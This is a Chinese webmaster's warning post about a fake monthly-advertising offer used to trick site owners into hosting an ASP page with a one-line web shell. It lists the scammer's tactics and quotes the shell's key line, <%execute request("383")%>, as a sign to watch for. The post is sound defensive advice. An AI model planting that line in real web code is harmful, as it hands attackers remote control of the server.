爱华网最近联盟广告越来越不好做,联盟单价底,扣量历害,电影诱导注册也不让做,图铃效果也不好,gg收钱又太慢,像我们这样的穷站长,最希望的是让自己的这点流量能尽快的换成真金白银,所以在这个时期相信不少的站长会选择做包月广告,又方便,来钱也快,我也不例外。
今天一上qq,有个家伙就加我,说要在我的度谷流量交换网http://www.duguu.com上做包月广告。我当时心里还在想,有这好事。我正想出去找包月呢,结果自己找上门来了,接着我就和他谈一翻,谈定的价格。完了他就让我给他把广告先做上,他想看看效果,我就给他传上了。我在传上后细想了下发现不对,再回来仔细看了下他的代码,发现有问题,才知道上当,赶紧把代码删除掉。
经过我一个小时的查询和测试,证实了该用户放得的确是木马程序,叫一句话木马。
我通过自己测试,该木马页面可以通过一个叫"蓝屏大叔连接端"的页面来提交木马程序。如果你网站所在的服务器没有限制这种木马程序,哪么就会在你站的根目录下生成一个文件,这个文件名是不定的,他的作用就可以控制你的网站所在目录和文件,更利害的可以控制你的整台服务器,所以想着就来气,为了不让更多的站长上当受骗,所以把他写出来,希望能给大伙提个醒,第一次写文章,再加上心情不爽,有脱节和不顺的地方请多原谅。以下是我发现的几个可疑的地方,如果大家碰到了请注意。
1、他会主动找你,他的广告页面是一个音乐网(对于这种广告主一定要多留个心眼)
2、他做广告,谈价格很爽快,不会跟你怎么还价 (感觉不踏实,要小心)
3、他的广告很特别,需要在你的网站上放一个asp页面,他放这个页面的目的就是为了放木马用。(他的代码中还有一个跳转操作,我以这样的 广告页面会影响我的排名和百度收录为由,想让他换成html的,他不同意,原因是asp可以放他的木马程序,不过php或jsp我就不知道了。估计 同类也要提防。)
4、他的代码中有一行asp的代码:<%execute request("383")%> (木马的关键执行语句,如果有这行,坚决不能做)
5、他们让你先放上代码试看效果。 (在试看效果的这段时间内,他会找各种借口来拖延时间,比如说你的网站访问速度慢,比如问你有没有什 么银行的账号等等,另外他还会装出一副付钱很爽快的样子,来让你放松对他的警惕。)
6、他在拖延时间后在一段时间内不会再上线,你问话他就消失了。(如果你到了这一步,哪你一定上当了。)
上当后请尽快检查你的服务器或空间中有没有新文件产生,如果有立马删除。希望各位站长朋友加强警惕。
在落伍我已看到有不少用户上当了,在站长网也有用户发了同类贴子,我再发这篇,真的希望能够引起大家的注意。
